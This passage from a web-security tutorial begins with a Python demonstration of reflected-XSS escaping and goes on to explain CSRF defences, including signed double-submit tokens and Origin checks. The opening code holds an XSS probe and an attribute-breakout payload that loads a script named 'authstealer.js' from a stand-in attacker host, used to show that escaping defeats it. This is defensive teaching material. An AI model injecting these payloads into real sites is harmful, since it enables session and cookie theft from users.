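    return SEARCH_TEMPLATE.format(q=html.escape(q, quote=True))


def respond(q: str, safe: bool = True):
    """Build (status, headers, body) the way a small WSGI handler would."""
    body = render_search_safe(q) if safe else render_search_unsafe(q)
    headers = {"Content-Type": "text/html; charset=utf-8"}
    if safe:
        headers.update(SECURITY_HEADERS)
    return 200, headers, body


def is_reflected_unencoded(payload: str, body: str) -> bool:
    """The check a tester runs first: did the raw payload come back byte-for-byte?"""
    return payload in body


# The probe from the walkthrough, and an attribute-breakout variant of the real payload.
PROBE = "<script type='text/javascript'>alert('XSS');</script>"
ATTR_BREAKOUT = '"><script src="http://hackersite.com/authstealer.js"></script>'

if __name__ == "__main__":
    for payload in (PROBE, ATTR_BREAKOUT):
        print("unsafe reflects:", is_reflected_unencoded(payload, render_search_unsafe(payload)))
        print("safe reflects:  ", is_reflected_unencoded(payload, render_search_safe(payload)))
    print(render_search_safe(ATTR_BREAKOUT))
```

Two things to notice: in the unsafe output the breakout payload closes the value attribute and opens a script element, while in the safe output the same bytes appear as &quot;&gt;&lt;script ... inside the attribute and as plain text in the paragraph. Marking the session cookie HttpOnly (and Secure) is the complementary control for the cookie-theft outcome the walkthrough describes, since document.cookie then cannot read it even when an injection does slip through.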

Methods of CSRF Mitigation and Prevention


A number of effective methods exist for both the prevention and mitigation of CSRF attacks. From a user's perspective, prevention is a matter of safeguarding login credentials and shrinking the window in which an authenticated session exists for a forged cross-site request to ride on.

Best practices include:

  • Logging off web applications when not in use
  • Securing usernames and passwords
  • Not allowing browsers to remember passwords
  • Avoiding browsing other sites while logged in to a sensitive application

For web applications, multiple solutions exist to block malicious traffic and prevent attacks. The most common is the synchronizer token: the server generates a unique, unpredictable token per session (or per request), embeds it in every form or state-changing request it serves, and verifies the submitted value against the token it stored for that session. Requests whose token is missing, reused or does not match the session are rejected before they reach the application. A cross-site attacker cannot read the token out of the victim's page, so cannot forge a request that carries it.

Double submission of cookies is another well-known method to block CSRF. Similar in spirit to the synchronizer token, the server sets a random token in a cookie and requires the same value in a request parameter; the server then verifies that the two match before granting access to the application. Because a cross-site attacker can neither read the cookie nor the page, they cannot supply a matching pair. Signing the cookie token with a server-side secret and binding it to the session closes the remaining gap, where an attacker able to set cookies for a sibling subdomain plants their own matching pair.

While effective, tokens can be exposed at a number of points, including browser history, HTTP log files, network appliances that log the first line of an HTTP request, and Referer headers if the protected site links to an external URL. Most of these exposures come from putting the token in a URL, so send it in a POST body or a request header instead. These potential weak spots make tokens less than a foolproof solution on their own, which is why they are normally combined with an Origin or Referer check on state-changing requests and with the SameSite attribute on session cookies, so the browser itself stops attaching the session to cross-site requests.
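As an added example that is not part of the original article, here is the signed double-submit cookie check described above, combined with an Origin/Referer check, implemented in Python against constructed request dictionaries. The request shape, the header and cookie names and the secret are assumptions of this example; the HMAC binding of the token to the session id is what stops an attacker who can set a cookie on a sibling subdomain from supplying their own matching pair.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit


def _sign(secret: bytes, session_id: str, nonce: str) -> str:
    """HMAC over session id and nonce: only the server can mint a valid token."""
    return hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()


def issue_csrf_token(secret: bytes, session_id: str) -> str:
    """Token to set in the 'csrf' cookie and to embed in every form for this session."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_sign(secret, session_id, nonce)}"


def token_bound_to_session(secret: bytes, session_id: str, token: str) -> bool:
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    return hmac.compare_digest(mac, _sign(secret, session_id, nonce))


def _same_origin(url: str, allowed_origin: str) -> bool:
    """Exact scheme://host[:port] comparison; a prefix test would accept
    https://bank.example.evil.com for https://bank.example."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}" == allowed_origin


def verify_state_changing_request(secret: bytes, request: dict, allowed_origin: str):
    """Return (accepted, reason). request is a constructed dict with the keys
    method, headers, cookies and form, standing in for a real framework object."""
    if request["method"].upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method, no state change expected"
    headers = request.get("headers", {})
    source = headers.get("Origin") or headers.get("Referer")
    if not source or not _same_origin(source, allowed_origin):
        return False, "cross-origin or unattributable request"   # fail closed if both headers absent
    cookies, form = request.get("cookies", {}), request.get("form", {})
    session_id, cookie_token, form_token = cookies.get("session"), cookies.get("csrf"), form.get("csrf")
    if not (session_id and cookie_token and form_token):
        return False, "missing session or CSRF token"
    if not hmac.compare_digest(cookie_token, form_token):
        return False, "cookie and form tokens differ"           # classic cross-site POST
    if not token_bound_to_session(secret, session_id, cookie_token):
        return False, "token not issued for this session"       # planted or replayed pair
    return True, "ok"


if __name__ == "__main__":
    secret, sid, origin = b"constructed-demo-secret", "sess-123", "https://bank.example"
    token = issue_csrf_token(secret, sid)
    legit = {"method": "POST", "headers": {"Origin": origin},
             "cookies": {"session": sid, "csrf": token}, "form": {"csrf": token}}
    forged = {"method": "POST", "headers": {"Origin": "https://evil.example"},
              "cookies": {"session": sid, "csrf": token}, "form": {"amount": "1000"}}
    print(verify_state_changing_request(secret, legit, origin))
    print(verify_state_changing_request(secret, forged, origin))
```

The token is deliberately never placed in a URL, which removes the history and log exposures the paragraph above lists, and the session binding means a token lifted from one user's page is useless against another's session.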

Using custom rules to prevent CSRF attacks

The highly individual nature of CSRF attacks makes a one-size-fits-all solution hard to build. However, custom security policies can be employed to guard against the CSRF scenarios a particular application faces.

This approach sidesteps the social engineering side of CSRF entirely: a request that originates outside the defined security perimeter is refused regardless of its content, so it no longer matters whether the user was tricked into sending it.

Alternatively, you can run the rule in an alert-only mode to track possible exploit attempts before enforcing it, or present a CAPTCHA that makes the unwary user aware a request is being made on their behalf.